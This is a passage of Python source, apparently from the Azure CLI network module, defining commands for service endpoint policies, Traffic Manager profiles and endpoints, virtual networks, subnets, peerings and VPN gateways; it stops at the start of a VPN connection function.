def create_service_endpoint_policy(cmd, resource_group_name, service_endpoint_policy_name, location=None, tags=None):
client = network_client_factory(cmd.cli_ctx).service_endpoint_policies
ServiceEndpointPolicy = cmd.get_models('ServiceEndpointPolicy')
policy = ServiceEndpointPolicy(tags=tags, location=location)
return client.begin_create_or_update(resource_group_name, service_endpoint_policy_name, policy)
def list_service_endpoint_policies(cmd, resource_group_name=None):
client = network_client_factory(cmd.cli_ctx).service_endpoint_policies
if resource_group_name:
return client.list_by_resource_group(resource_group_name)
return client.list()
def update_service_endpoint_policy(instance, tags=None):
if tags is not None:
instance.tags = tags
return instance
def create_service_endpoint_policy_definition(cmd, resource_group_name, service_endpoint_policy_name,
service_endpoint_policy_definition_name, service, service_resources,
description=None):
client = network_client_factory(cmd.cli_ctx).service_endpoint_policy_definitions
ServiceEndpointPolicyDefinition = cmd.get_models('ServiceEndpointPolicyDefinition')
policy_def = ServiceEndpointPolicyDefinition(description=description, service=service,
service_resources=service_resources)
return client.begin_create_or_update(resource_group_name, service_endpoint_policy_name,
service_endpoint_policy_definition_name, policy_def)
def update_service_endpoint_policy_definition(instance, service=None, service_resources=None, description=None):
if service is not None:
instance.service = service
if service_resources is not None:
instance.service_resources = service_resources
if description is not None:
instance.description = description
return instance
# endregion
# region TrafficManagers
def list_traffic_manager_profiles(cmd, resource_group_name=None):
from azure.mgmt.trafficmanager import TrafficManagerManagementClient
client = get_mgmt_service_client(cmd.cli_ctx, TrafficManagerManagementClient).profiles
if resource_group_name:
return client.list_by_resource_group(resource_group_name)
return client.list_by_subscription()
def create_traffic_manager_profile(cmd, traffic_manager_profile_name, resource_group_name,
routing_method, unique_dns_name, monitor_path=None,
monitor_port=80, monitor_protocol=MonitorProtocol.http.value,
profile_status=ProfileStatus.enabled.value,
ttl=30, tags=None, interval=None, timeout=None, max_failures=None,
monitor_custom_headers=None, status_code_ranges=None, max_return=None):
from azure.mgmt.trafficmanager import TrafficManagerManagementClient
from azure.mgmt.trafficmanager.models import Profile, DnsConfig, MonitorConfig
client = get_mgmt_service_client(cmd.cli_ctx, TrafficManagerManagementClient).profiles
if monitor_path is None and monitor_protocol == 'HTTP':
monitor_path = '/'
profile = Profile(location='global', tags=tags, profile_status=profile_status,
traffic_routing_method=routing_method,
dns_config=DnsConfig(relative_name=unique_dns_name, ttl=ttl),
monitor_config=MonitorConfig(protocol=monitor_protocol,
port=monitor_port,
path=monitor_path,
interval_in_seconds=interval,
timeout_in_seconds=timeout,
tolerated_number_of_failures=max_failures,
custom_headers=monitor_custom_headers,
expected_status_code_ranges=status_code_ranges),
max_return=max_return)
return client.create_or_update(resource_group_name, traffic_manager_profile_name, profile)
def update_traffic_manager_profile(instance, profile_status=None, routing_method=None, tags=None,
monitor_protocol=None, monitor_port=None, monitor_path=None,
ttl=None, timeout=None, interval=None, max_failures=None,
monitor_custom_headers=None, status_code_ranges=None, max_return=None):
if tags is not None:
instance.tags = tags
if profile_status is not None:
instance.profile_status = profile_status
if routing_method is not None:
instance.traffic_routing_method = routing_method
if ttl is not None:
instance.dns_config.ttl = ttl
if monitor_protocol is not None:
instance.monitor_config.protocol = monitor_protocol
if monitor_port is not None:
instance.monitor_config.port = monitor_port
if monitor_path == '':
instance.monitor_config.path = None
elif monitor_path is not None:
instance.monitor_config.path = monitor_path
if interval is not None:
instance.monitor_config.interval_in_seconds = interval
if timeout is not None:
instance.monitor_config.timeout_in_seconds = timeout
if max_failures is not None:
instance.monitor_config.tolerated_number_of_failures = max_failures
if monitor_custom_headers is not None:
instance.monitor_config.custom_headers = monitor_custom_headers
if status_code_ranges is not None:
instance.monitor_config.expected_status_code_ranges = status_code_ranges
if max_return is not None:
instance.max_return = max_return
# TODO: Remove workaround after https://github.com/Azure/azure-rest-api-specs/issues/1940 fixed
for endpoint in instance.endpoints:
endpoint._validation = { # pylint: disable=protected-access
'name': {'readonly': False},
'type': {'readonly': False},
}
return instance
def create_traffic_manager_endpoint(cmd, resource_group_name, profile_name, endpoint_type, endpoint_name,
target_resource_id=None, target=None,
endpoint_status=None, weight=None, priority=None,
endpoint_location=None, endpoint_monitor_status=None,
min_child_endpoints=None, geo_mapping=None,
monitor_custom_headers=None, subnets=None):
from azure.mgmt.trafficmanager import TrafficManagerManagementClient
from azure.mgmt.trafficmanager.models import Endpoint
ncf = get_mgmt_service_client(cmd.cli_ctx, TrafficManagerManagementClient).endpoints
endpoint = Endpoint(target_resource_id=target_resource_id, target=target,
endpoint_status=endpoint_status, weight=weight, priority=priority,
endpoint_location=endpoint_location,
endpoint_monitor_status=endpoint_monitor_status,
min_child_endpoints=min_child_endpoints,
geo_mapping=geo_mapping,
subnets=subnets,
custom_headers=monitor_custom_headers)
return ncf.create_or_update(resource_group_name, profile_name, endpoint_type, endpoint_name,
endpoint)
def update_traffic_manager_endpoint(instance, endpoint_type=None, endpoint_location=None,
endpoint_status=None, endpoint_monitor_status=None,
priority=None, target=None, target_resource_id=None,
weight=None, min_child_endpoints=None, geo_mapping=None,
subnets=None, monitor_custom_headers=None):
if endpoint_location is not None:
instance.endpoint_location = endpoint_location
if endpoint_status is not None:
instance.endpoint_status = endpoint_status
if endpoint_monitor_status is not None:
instance.endpoint_monitor_status = endpoint_monitor_status
if priority is not None:
instance.priority = priority
if target is not None:
instance.target = target
if target_resource_id is not None:
instance.target_resource_id = target_resource_id
if weight is not None:
instance.weight = weight
if min_child_endpoints is not None:
instance.min_child_endpoints = min_child_endpoints
if geo_mapping is not None:
instance.geo_mapping = geo_mapping
if subnets is not None:
instance.subnets = subnets
if monitor_custom_headers:
instance.custom_headers = monitor_custom_headers
return instance
def list_traffic_manager_endpoints(cmd, resource_group_name, profile_name, endpoint_type=None):
from azure.mgmt.trafficmanager import TrafficManagerManagementClient
client = get_mgmt_service_client(cmd.cli_ctx, TrafficManagerManagementClient).profiles
profile = client.get(resource_group_name, profile_name)
return [e for e in profile.endpoints if not endpoint_type or e.type.endswith(endpoint_type)]
# endregion
# region VirtualNetworks
# pylint: disable=too-many-locals
def create_vnet(cmd, resource_group_name, vnet_name, vnet_prefixes='10.0.0.0/16',
subnet_name=None, subnet_prefix=None, dns_servers=None,
location=None, tags=None, vm_protection=None, ddos_protection=None, bgp_community=None,
ddos_protection_plan=None, network_security_group=None, edge_zone=None, flowtimeout=None,
enable_encryption=None, encryption_enforcement_policy=None):
AddressSpace, DhcpOptions, Subnet, VirtualNetwork, SubResource, NetworkSecurityGroup = \
cmd.get_models('AddressSpace', 'DhcpOptions', 'Subnet', 'VirtualNetwork',
'SubResource', 'NetworkSecurityGroup')
client = network_client_factory(cmd.cli_ctx).virtual_networks
tags = tags or {}
vnet = VirtualNetwork(
location=location, tags=tags,
dhcp_options=DhcpOptions(dns_servers=dns_servers),
address_space=AddressSpace(address_prefixes=(vnet_prefixes if isinstance(vnet_prefixes, list) else [vnet_prefixes]))) # pylint: disable=line-too-long
if subnet_name:
if cmd.supported_api_version(min_api='2018-08-01'):
vnet.subnets = [Subnet(name=subnet_name,
address_prefix=subnet_prefix[0] if len(subnet_prefix) == 1 else None,
address_prefixes=subnet_prefix if len(subnet_prefix) > 1 else None,
network_security_group=NetworkSecurityGroup(id=network_security_group)
if network_security_group else None)]
else:
vnet.subnets = [Subnet(name=subnet_name, address_prefix=subnet_prefix)]
if cmd.supported_api_version(min_api='2017-09-01'):
vnet.enable_ddos_protection = ddos_protection
vnet.enable_vm_protection = vm_protection
if cmd.supported_api_version(min_api='2018-02-01'):
vnet.ddos_protection_plan = SubResource(id=ddos_protection_plan) if ddos_protection_plan else None
if edge_zone:
vnet.extended_location = _edge_zone_model(cmd, edge_zone)
if flowtimeout is not None:
vnet.flow_timeout_in_minutes = flowtimeout
if bgp_community is not None and cmd.supported_api_version(min_api='2020-06-01'):
VirtualNetworkBgpCommunities = cmd.get_models('VirtualNetworkBgpCommunities')
vnet.bgp_communities = VirtualNetworkBgpCommunities(virtual_network_community=bgp_community)
if enable_encryption is not None:
if not vnet.encryption:
vnet.encryption = {}
vnet.encryption["enabled"] = enable_encryption
if encryption_enforcement_policy is not None:
if not vnet.encryption:
            raise ArgumentUsageError('usage error: --encryption-enforcement-policy is only configurable when '
                                     '--enable-encryption is specified.')
vnet.encryption["enforcement"] = encryption_enforcement_policy
return cached_put(cmd, client.begin_create_or_update, vnet, resource_group_name, vnet_name)
def update_vnet(cmd, instance, vnet_prefixes=None, dns_servers=None, ddos_protection=None, vm_protection=None,
ddos_protection_plan=None, flowtimeout=None, bgp_community=None, enable_encryption=None,
encryption_enforcement_policy=None):
    # Server-side validation returns a clear error message for an invalid CIDR,
    # so we don't validate on the client side.
AddressSpace, DhcpOptions, SubResource = cmd.get_models('AddressSpace', 'DhcpOptions', 'SubResource')
if vnet_prefixes and instance.address_space:
instance.address_space.address_prefixes = vnet_prefixes
elif vnet_prefixes:
instance.address_space = AddressSpace(address_prefixes=vnet_prefixes)
if dns_servers == ['']:
instance.dhcp_options.dns_servers = None
elif dns_servers and instance.dhcp_options:
instance.dhcp_options.dns_servers = dns_servers
elif dns_servers:
instance.dhcp_options = DhcpOptions(dns_servers=dns_servers)
if ddos_protection is not None:
instance.enable_ddos_protection = ddos_protection
if vm_protection is not None:
instance.enable_vm_protection = vm_protection
if ddos_protection_plan == '':
instance.ddos_protection_plan = None
elif ddos_protection_plan is not None:
instance.ddos_protection_plan = SubResource(id=ddos_protection_plan)
if flowtimeout is not None:
instance.flow_timeout_in_minutes = flowtimeout
if bgp_community is not None and cmd.supported_api_version(min_api='2020-06-01'):
VirtualNetworkBgpCommunities = cmd.get_models('VirtualNetworkBgpCommunities')
instance.bgp_communities = VirtualNetworkBgpCommunities(virtual_network_community=bgp_community)
if enable_encryption is not None:
if not instance.encryption:
VirtualNetworkEncryption = cmd.get_models('VirtualNetworkEncryption')
instance.encryption = VirtualNetworkEncryption(enabled=enable_encryption)
instance.encryption.enabled = enable_encryption
if encryption_enforcement_policy is not None:
if not instance.encryption:
            raise ArgumentUsageError('usage error: --encryption-enforcement-policy is only configurable when '
                                     '--enable-encryption is specified.')
instance.encryption.enforcement = encryption_enforcement_policy
return instance
def _set_route_table(ncf, resource_group_name, route_table, subnet):
if route_table:
is_id = is_valid_resource_id(route_table)
rt = None
if is_id:
res_id = parse_resource_id(route_table)
rt = ncf.route_tables.get(res_id['resource_group'], res_id['name'])
else:
rt = ncf.route_tables.get(resource_group_name, route_table)
subnet.route_table = rt
elif route_table == '':
subnet.route_table = None
def create_subnet(cmd, resource_group_name, virtual_network_name, subnet_name,
address_prefix, network_security_group=None,
route_table=None, service_endpoints=None, service_endpoint_policy=None,
delegations=None, nat_gateway=None,
disable_private_endpoint_network_policies=None,
disable_private_link_service_network_policies=None):
NetworkSecurityGroup, ServiceEndpoint, Subnet, SubResource = cmd.get_models(
'NetworkSecurityGroup', 'ServiceEndpointPropertiesFormat', 'Subnet', 'SubResource')
ncf = network_client_factory(cmd.cli_ctx)
if cmd.supported_api_version(min_api='2018-08-01'):
subnet = Subnet(
name=subnet_name,
address_prefixes=address_prefix if len(address_prefix) > 1 else None,
address_prefix=address_prefix[0] if len(address_prefix) == 1 else None
)
if cmd.supported_api_version(min_api='2019-02-01') and nat_gateway:
subnet.nat_gateway = SubResource(id=nat_gateway)
else:
subnet = Subnet(name=subnet_name, address_prefix=address_prefix)
if network_security_group:
subnet.network_security_group = NetworkSecurityGroup(id=network_security_group)
_set_route_table(ncf, resource_group_name, route_table, subnet)
if service_endpoints:
subnet.service_endpoints = []
for service in service_endpoints:
subnet.service_endpoints.append(ServiceEndpoint(service=service))
if service_endpoint_policy:
subnet.service_endpoint_policies = []
for policy in service_endpoint_policy:
subnet.service_endpoint_policies.append(SubResource(id=policy))
if delegations:
subnet.delegations = delegations
if disable_private_endpoint_network_policies is True:
subnet.private_endpoint_network_policies = "Disabled"
if disable_private_endpoint_network_policies is False:
subnet.private_endpoint_network_policies = "Enabled"
if disable_private_link_service_network_policies is True:
subnet.private_link_service_network_policies = "Disabled"
if disable_private_link_service_network_policies is False:
subnet.private_link_service_network_policies = "Enabled"
vnet = cached_get(cmd, ncf.virtual_networks.get, resource_group_name, virtual_network_name)
upsert_to_collection(vnet, 'subnets', subnet, 'name')
vnet = cached_put(
cmd, ncf.virtual_networks.begin_create_or_update, vnet, resource_group_name, virtual_network_name).result()
return get_property(vnet.subnets, subnet_name)
def update_subnet(cmd, instance, resource_group_name, address_prefix=None, network_security_group=None,
route_table=None, service_endpoints=None, delegations=None, nat_gateway=None,
service_endpoint_policy=None, disable_private_endpoint_network_policies=None,
disable_private_link_service_network_policies=None):
NetworkSecurityGroup, ServiceEndpoint, SubResource = cmd.get_models(
'NetworkSecurityGroup', 'ServiceEndpointPropertiesFormat', 'SubResource')
if address_prefix:
if cmd.supported_api_version(min_api='2018-08-01'):
instance.address_prefixes = address_prefix if len(address_prefix) > 1 else None
instance.address_prefix = address_prefix[0] if len(address_prefix) == 1 else None
else:
instance.address_prefix = address_prefix
if cmd.supported_api_version(min_api='2019-02-01') and nat_gateway:
instance.nat_gateway = SubResource(id=nat_gateway)
elif nat_gateway == '':
instance.nat_gateway = None
if network_security_group:
instance.network_security_group = NetworkSecurityGroup(id=network_security_group)
elif network_security_group == '': # clear it
instance.network_security_group = None
_set_route_table(network_client_factory(cmd.cli_ctx), resource_group_name, route_table, instance)
if service_endpoints == ['']:
instance.service_endpoints = None
elif service_endpoints:
instance.service_endpoints = []
for service in service_endpoints:
instance.service_endpoints.append(ServiceEndpoint(service=service))
if service_endpoint_policy == '':
instance.service_endpoint_policies = None
elif service_endpoint_policy:
instance.service_endpoint_policies = []
for policy in service_endpoint_policy:
instance.service_endpoint_policies.append(SubResource(id=policy))
if delegations:
instance.delegations = delegations
if disable_private_endpoint_network_policies:
instance.private_endpoint_network_policies = "Disabled"
elif disable_private_endpoint_network_policies is not None:
instance.private_endpoint_network_policies = "Enabled"
if disable_private_link_service_network_policies:
instance.private_link_service_network_policies = "Disabled"
elif disable_private_link_service_network_policies is not None:
instance.private_link_service_network_policies = "Enabled"
return instance
def list_avail_subnet_delegations(cmd, resource_group_name=None, location=None):
client = network_client_factory(cmd.cli_ctx)
if resource_group_name:
return client.available_resource_group_delegations.list(location, resource_group_name)
return client.available_delegations.list(location)
def create_vnet_peering(cmd, resource_group_name, virtual_network_name, virtual_network_peering_name,
remote_virtual_network, allow_virtual_network_access=False,
allow_forwarded_traffic=False, allow_gateway_transit=False,
use_remote_gateways=False):
if not is_valid_resource_id(remote_virtual_network):
remote_virtual_network = resource_id(
subscription=get_subscription_id(cmd.cli_ctx),
resource_group=resource_group_name,
namespace='Microsoft.Network',
type='virtualNetworks',
name=remote_virtual_network
)
SubResource, VirtualNetworkPeering = cmd.get_models('SubResource', 'VirtualNetworkPeering')
peering = VirtualNetworkPeering(
id=resource_id(
subscription=get_subscription_id(cmd.cli_ctx),
resource_group=resource_group_name,
namespace='Microsoft.Network',
type='virtualNetworks',
name=virtual_network_name),
name=virtual_network_peering_name,
remote_virtual_network=SubResource(id=remote_virtual_network),
allow_virtual_network_access=allow_virtual_network_access,
allow_gateway_transit=allow_gateway_transit,
allow_forwarded_traffic=allow_forwarded_traffic,
use_remote_gateways=use_remote_gateways)
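    # The remote VNet may live in a different subscription; pass it as an auxiliary
    # subscription so cross-subscription peering requests are authorized.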
aux_subscription = parse_resource_id(remote_virtual_network)['subscription']
ncf = network_client_factory(cmd.cli_ctx, aux_subscriptions=[aux_subscription])
return ncf.virtual_network_peerings.begin_create_or_update(
resource_group_name, virtual_network_name, virtual_network_peering_name, peering)
def update_vnet_peering(cmd, resource_group_name, virtual_network_name, virtual_network_peering_name, **kwargs):
peering = kwargs['parameters']
aux_subscription = parse_resource_id(peering.remote_virtual_network.id)['subscription']
ncf = network_client_factory(cmd.cli_ctx, aux_subscriptions=[aux_subscription])
return ncf.virtual_network_peerings.begin_create_or_update(
resource_group_name, virtual_network_name, virtual_network_peering_name, peering)
def list_available_ips(cmd, resource_group_name, virtual_network_name):
client = network_client_factory(cmd.cli_ctx).virtual_networks
vnet = client.get(resource_group_name=resource_group_name,
virtual_network_name=virtual_network_name)
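    # Query availability of the first address in the VNet's first prefix; the response
    # carries the list of available IP addresses that is returned below.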
start_ip = vnet.address_space.address_prefixes[0].split('/')[0]
available_ips = client.check_ip_address_availability(resource_group_name=resource_group_name,
virtual_network_name=virtual_network_name,
ip_address=start_ip)
return available_ips.available_ip_addresses
# endregion
# region VirtualNetworkGateways
def create_vnet_gateway_root_cert(cmd, resource_group_name, gateway_name, public_cert_data, cert_name):
VpnClientRootCertificate = cmd.get_models('VpnClientRootCertificate')
ncf = network_client_factory(cmd.cli_ctx).virtual_network_gateways
gateway = ncf.get(resource_group_name, gateway_name)
if not gateway.vpn_client_configuration:
raise CLIError("Must add address prefixes to gateway '{}' prior to adding a root cert."
.format(gateway_name))
config = gateway.vpn_client_configuration
if config.vpn_client_root_certificates is None:
config.vpn_client_root_certificates = []
cert = VpnClientRootCertificate(name=cert_name, public_cert_data=public_cert_data)
upsert_to_collection(config, 'vpn_client_root_certificates', cert, 'name')
return ncf.begin_create_or_update(resource_group_name, gateway_name, gateway)
def delete_vnet_gateway_root_cert(cmd, resource_group_name, gateway_name, cert_name):
ncf = network_client_factory(cmd.cli_ctx).virtual_network_gateways
gateway = ncf.get(resource_group_name, gateway_name)
config = gateway.vpn_client_configuration
try:
cert = next(c for c in config.vpn_client_root_certificates if c.name == cert_name)
except (AttributeError, StopIteration):
raise CLIError('Certificate "{}" not found in gateway "{}"'.format(cert_name, gateway_name))
config.vpn_client_root_certificates.remove(cert)
return ncf.begin_create_or_update(resource_group_name, gateway_name, gateway)
def create_vnet_gateway_revoked_cert(cmd, resource_group_name, gateway_name, thumbprint, cert_name):
VpnClientRevokedCertificate = cmd.get_models('VpnClientRevokedCertificate')
config, gateway, ncf = _prep_cert_create(cmd, gateway_name, resource_group_name)
cert = VpnClientRevokedCertificate(name=cert_name, thumbprint=thumbprint)
upsert_to_collection(config, 'vpn_client_revoked_certificates', cert, 'name')
return ncf.begin_create_or_update(resource_group_name, gateway_name, gateway)
def delete_vnet_gateway_revoked_cert(cmd, resource_group_name, gateway_name, cert_name):
ncf = network_client_factory(cmd.cli_ctx).virtual_network_gateways
gateway = ncf.get(resource_group_name, gateway_name)
config = gateway.vpn_client_configuration
try:
cert = next(c for c in config.vpn_client_revoked_certificates if c.name == cert_name)
except (AttributeError, StopIteration):
raise CLIError('Certificate "{}" not found in gateway "{}"'.format(cert_name, gateway_name))
config.vpn_client_revoked_certificates.remove(cert)
return ncf.begin_create_or_update(resource_group_name, gateway_name, gateway)
def _prep_cert_create(cmd, gateway_name, resource_group_name):
VpnClientConfiguration = cmd.get_models('VpnClientConfiguration')
ncf = network_client_factory(cmd.cli_ctx).virtual_network_gateways
gateway = ncf.get(resource_group_name, gateway_name)
if not gateway.vpn_client_configuration:
gateway.vpn_client_configuration = VpnClientConfiguration()
config = gateway.vpn_client_configuration
if not config.vpn_client_address_pool or not config.vpn_client_address_pool.address_prefixes:
raise CLIError('Address prefixes must be set on VPN gateways before adding'
' certificates. Please use "update" with --address-prefixes first.')
if config.vpn_client_revoked_certificates is None:
config.vpn_client_revoked_certificates = []
if config.vpn_client_root_certificates is None:
config.vpn_client_root_certificates = []
return config, gateway, ncf
def create_vnet_gateway(cmd, resource_group_name, virtual_network_gateway_name, public_ip_address,
virtual_network, location=None, tags=None,
no_wait=False, gateway_type=None, sku=None, vpn_type=None, vpn_gateway_generation=None,
asn=None, bgp_peering_address=None, peer_weight=None,
address_prefixes=None, radius_server=None, radius_secret=None, client_protocol=None,
gateway_default_site=None, custom_routes=None, aad_tenant=None, aad_audience=None,
aad_issuer=None, root_cert_data=None, root_cert_name=None, vpn_auth_type=None, edge_zone=None,
nat_rule=None):
(VirtualNetworkGateway, BgpSettings, SubResource, VirtualNetworkGatewayIPConfiguration, VirtualNetworkGatewaySku,
VpnClientConfiguration, AddressSpace, VpnClientRootCertificate, VirtualNetworkGatewayNatRule,
VpnNatRuleMapping) = cmd.get_models(
'VirtualNetworkGateway', 'BgpSettings', 'SubResource', 'VirtualNetworkGatewayIPConfiguration',
'VirtualNetworkGatewaySku', 'VpnClientConfiguration', 'AddressSpace', 'VpnClientRootCertificate',
'VirtualNetworkGatewayNatRule', 'VpnNatRuleMapping')
client = network_client_factory(cmd.cli_ctx).virtual_network_gateways
subnet = virtual_network + '/subnets/GatewaySubnet'
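    # Two public IP addresses mean the gateway is deployed in active-active mode.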
active = len(public_ip_address) == 2
vnet_gateway = VirtualNetworkGateway(
gateway_type=gateway_type, vpn_type=vpn_type, vpn_gateway_generation=vpn_gateway_generation, location=location,
tags=tags, sku=VirtualNetworkGatewaySku(name=sku, tier=sku), active=active, ip_configurations=[],
gateway_default_site=SubResource(id=gateway_default_site) if gateway_default_site else None)
for i, public_ip in enumerate(public_ip_address):
ip_configuration = VirtualNetworkGatewayIPConfiguration(
subnet=SubResource(id=subnet),
public_ip_address=SubResource(id=public_ip),
private_ip_allocation_method='Dynamic',
name='vnetGatewayConfig{}'.format(i)
)
vnet_gateway.ip_configurations.append(ip_configuration)
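    # Supplying any BGP-related argument implies BGP should be enabled on the gateway.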
if asn or bgp_peering_address or peer_weight:
vnet_gateway.enable_bgp = True
vnet_gateway.bgp_settings = BgpSettings(asn=asn, bgp_peering_address=bgp_peering_address,
peer_weight=peer_weight)
if any((address_prefixes, client_protocol)):
vnet_gateway.vpn_client_configuration = VpnClientConfiguration()
vnet_gateway.vpn_client_configuration.vpn_client_address_pool = AddressSpace()
vnet_gateway.vpn_client_configuration.vpn_client_address_pool.address_prefixes = address_prefixes
vnet_gateway.vpn_client_configuration.vpn_client_protocols = client_protocol
if any((radius_secret, radius_server)) and cmd.supported_api_version(min_api='2017-06-01'):
vnet_gateway.vpn_client_configuration.radius_server_address = radius_server
vnet_gateway.vpn_client_configuration.radius_server_secret = radius_secret
# multi authentication
if cmd.supported_api_version(min_api='2020-11-01'):
vnet_gateway.vpn_client_configuration.vpn_authentication_types = vpn_auth_type
vnet_gateway.vpn_client_configuration.aad_tenant = aad_tenant
vnet_gateway.vpn_client_configuration.aad_issuer = aad_issuer
vnet_gateway.vpn_client_configuration.aad_audience = aad_audience
vnet_gateway.vpn_client_configuration.vpn_client_root_certificates = [
VpnClientRootCertificate(name=root_cert_name,
public_cert_data=root_cert_data)] if root_cert_data else None
if custom_routes and cmd.supported_api_version(min_api='2019-02-01'):
vnet_gateway.custom_routes = AddressSpace()
vnet_gateway.custom_routes.address_prefixes = custom_routes
if edge_zone:
vnet_gateway.extended_location = _edge_zone_model(cmd, edge_zone)
    if nat_rule:
        vnet_gateway.nat_rules = [
            VirtualNetworkGatewayNatRule(
                type_properties_type=rule.get('type'),
                mode=rule.get('mode'),
                name=rule.get('name'),
                internal_mappings=[VpnNatRuleMapping(address_space=i_map) for i_map in rule.get('internal_mappings')]
                if rule.get('internal_mappings') else None,
                external_mappings=[VpnNatRuleMapping(address_space=e_map) for e_map in rule.get('external_mappings')]
                if rule.get('external_mappings') else None,
                ip_configuration_id=rule.get('ip_config_id'))
            for rule in nat_rule]
return sdk_no_wait(no_wait, client.begin_create_or_update,
resource_group_name, virtual_network_gateway_name, vnet_gateway)
def update_vnet_gateway(cmd, instance, sku=None, vpn_type=None, tags=None,
public_ip_address=None, gateway_type=None, enable_bgp=None,
asn=None, bgp_peering_address=None, peer_weight=None, virtual_network=None,
address_prefixes=None, radius_server=None, radius_secret=None, client_protocol=None,
gateway_default_site=None, custom_routes=None, aad_tenant=None, aad_audience=None,
aad_issuer=None, root_cert_data=None, root_cert_name=None, vpn_auth_type=None):
(AddressSpace, SubResource, VirtualNetworkGatewayIPConfiguration, VpnClientConfiguration,
VpnClientRootCertificate) = cmd.get_models('AddressSpace', 'SubResource', 'VirtualNetworkGatewayIPConfiguration',
'VpnClientConfiguration', 'VpnClientRootCertificate')
if any((address_prefixes, radius_server, radius_secret, client_protocol)) and not instance.vpn_client_configuration:
instance.vpn_client_configuration = VpnClientConfiguration()
if address_prefixes is not None:
if not instance.vpn_client_configuration.vpn_client_address_pool:
instance.vpn_client_configuration.vpn_client_address_pool = AddressSpace()
if not instance.vpn_client_configuration.vpn_client_address_pool.address_prefixes:
instance.vpn_client_configuration.vpn_client_address_pool.address_prefixes = []
instance.vpn_client_configuration.vpn_client_address_pool.address_prefixes = address_prefixes
with cmd.update_context(instance.vpn_client_configuration) as c:
c.set_param('vpn_client_protocols', client_protocol)
c.set_param('radius_server_address', radius_server)
c.set_param('radius_server_secret', radius_secret)
if cmd.supported_api_version(min_api='2020-11-01'):
c.set_param('aad_tenant', aad_tenant)
c.set_param('aad_audience', aad_audience)
c.set_param('aad_issuer', aad_issuer)
c.set_param('vpn_authentication_types', vpn_auth_type)
if root_cert_data and cmd.supported_api_version(min_api='2020-11-01'):
upsert_to_collection(instance.vpn_client_configuration, 'vpn_client_root_certificates',
VpnClientRootCertificate(name=root_cert_name, public_cert_data=root_cert_data), 'name')
with cmd.update_context(instance.sku) as c:
c.set_param('name', sku)
c.set_param('tier', sku)
with cmd.update_context(instance) as c:
c.set_param('gateway_default_site', SubResource(id=gateway_default_site) if gateway_default_site else None)
c.set_param('vpn_type', vpn_type)
c.set_param('tags', tags)
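    # Use the GatewaySubnet of the newly supplied virtual network, or fall back to the
    # subnet already referenced by the gateway's first IP configuration.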
subnet_id = '{}/subnets/GatewaySubnet'.format(virtual_network) if virtual_network else \
instance.ip_configurations[0].subnet.id
if virtual_network is not None:
for config in instance.ip_configurations:
config.subnet.id = subnet_id
if public_ip_address is not None:
instance.ip_configurations = []
for i, public_ip in enumerate(public_ip_address):
ip_configuration = VirtualNetworkGatewayIPConfiguration(
subnet=SubResource(id=subnet_id),
public_ip_address=SubResource(id=public_ip),
private_ip_allocation_method='Dynamic', name='vnetGatewayConfig{}'.format(i))
instance.ip_configurations.append(ip_configuration)
# Update active-active/active-standby status
active = len(public_ip_address) == 2
if instance.active and not active:
logger.info('Placing gateway in active-standby mode.')
elif not instance.active and active:
logger.info('Placing gateway in active-active mode.')
instance.active = active
if gateway_type is not None:
instance.gateway_type = gateway_type
if enable_bgp is not None:
instance.enable_bgp = enable_bgp.lower() == 'true'
if custom_routes and cmd.supported_api_version(min_api='2019-02-01'):
if not instance.custom_routes:
instance.custom_routes = AddressSpace()
instance.custom_routes.address_prefixes = custom_routes
_validate_bgp_peering(cmd, instance, asn, bgp_peering_address, peer_weight)
return instance
def start_vnet_gateway_package_capture(cmd, client, resource_group_name, virtual_network_gateway_name,
filter_data=None, no_wait=False):
VpnPacketCaptureStartParameters = cmd.get_models('VpnPacketCaptureStartParameters')
parameters = VpnPacketCaptureStartParameters(filter_data=filter_data)
return sdk_no_wait(no_wait, client.begin_start_packet_capture, resource_group_name,
virtual_network_gateway_name, parameters=parameters)
def stop_vnet_gateway_package_capture(cmd, client, resource_group_name, virtual_network_gateway_name,
sas_url, no_wait=False):
VpnPacketCaptureStopParameters = cmd.get_models('VpnPacketCaptureStopParameters')
parameters = VpnPacketCaptureStopParameters(sas_url=sas_url)
return sdk_no_wait(no_wait, client.begin_stop_packet_capture, resource_group_name,
virtual_network_gateway_name, parameters=parameters)
def generate_vpn_client(cmd, client, resource_group_name, virtual_network_gateway_name, processor_architecture=None,
authentication_method=None, radius_server_auth_certificate=None, client_root_certificates=None,
use_legacy=False):
params = cmd.get_models('VpnClientParameters')(
processor_architecture=processor_architecture
)
if cmd.supported_api_version(min_api='2017-06-01') and not use_legacy:
params.authentication_method = authentication_method
params.radius_server_auth_certificate = radius_server_auth_certificate
params.client_root_certificates = client_root_certificates
return client.begin_generate_vpn_profile(resource_group_name, virtual_network_gateway_name, params)
# legacy implementation
return client.begin_generatevpnclientpackage(resource_group_name, virtual_network_gateway_name, params)
def set_vpn_client_ipsec_policy(cmd, client, resource_group_name, virtual_network_gateway_name,
sa_life_time_seconds, sa_data_size_kilobytes,
ipsec_encryption, ipsec_integrity,
ike_encryption, ike_integrity, dh_group, pfs_group, no_wait=False):
VpnClientIPsecParameters = cmd.get_models('VpnClientIPsecParameters')
vpnclient_ipsec_params = VpnClientIPsecParameters(sa_life_time_seconds=sa_life_time_seconds,
sa_data_size_kilobytes=sa_data_size_kilobytes,
ipsec_encryption=ipsec_encryption,
ipsec_integrity=ipsec_integrity,
ike_encryption=ike_encryption,
ike_integrity=ike_integrity,
dh_group=dh_group,
pfs_group=pfs_group)
return sdk_no_wait(no_wait, client.begin_set_vpnclient_ipsec_parameters, resource_group_name,
virtual_network_gateway_name, vpnclient_ipsec_params)
def disconnect_vnet_gateway_vpn_connections(cmd, client, resource_group_name, virtual_network_gateway_name,
vpn_connection_ids, no_wait=False):
P2SVpnConnectionRequest = cmd.get_models('P2SVpnConnectionRequest')
request = P2SVpnConnectionRequest(vpn_connection_ids=vpn_connection_ids)
return sdk_no_wait(no_wait, client.begin_disconnect_virtual_network_gateway_vpn_connections,
resource_group_name, virtual_network_gateway_name, request)
# endregion
# region VirtualNetworkGatewayConnections
# pylint: disable=too-many-locals
def create_vpn_connection(cmd, resource_group_name, connection_name, vnet_gateway1,
location=None, tags=None, no_wait=False, validate=False,
vnet_gateway2=None, express_route_circuit2=None, local_gateway2=None,
authorization_key=None, enable_bgp=False, routing_weight=10,
connection_type=None, shared_key=None,
use_policy_based_traffic_selectors=False,
express_route_gateway_bypass=None, ingress_nat_rule=None, egress_nat_rule=None):
from azure.cli.core.util import random_string
from azure.cli.core.commands.arm import ArmTemplateBuilder
from azure.cli.command_modules.network._template_builder import build_vpn_connection_resource
client = network_client_factory(cmd.cli_ctx).virtual_network_gateway_connections
